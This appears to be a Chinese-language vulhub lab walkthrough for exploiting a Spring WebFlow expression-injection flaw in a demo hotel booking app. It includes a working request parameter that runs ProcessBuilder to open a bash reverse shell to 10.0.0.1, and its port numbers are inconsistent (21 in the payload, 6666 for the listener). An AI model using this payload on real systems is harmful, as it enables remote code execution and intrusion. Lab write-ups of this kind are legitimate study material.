运行测试环境:docker-compose up -d
等待环境启动后,访问http://ip:8080
,将看到一个酒店预订的页面
首先访问http://ip:8080/login
,用页面左边给出的任意一个账号/密码登录系统:
然后访问id为1的酒店http://ip:8080/hotels/1
,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了):
再点击确认“Confirm”:进行抓包
我们向其中添加一个字段(也就是反弹shell的POC):&_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
攻击机监听端口6666
改好之后,先开启监听
然后burp放包,再次查看
成功。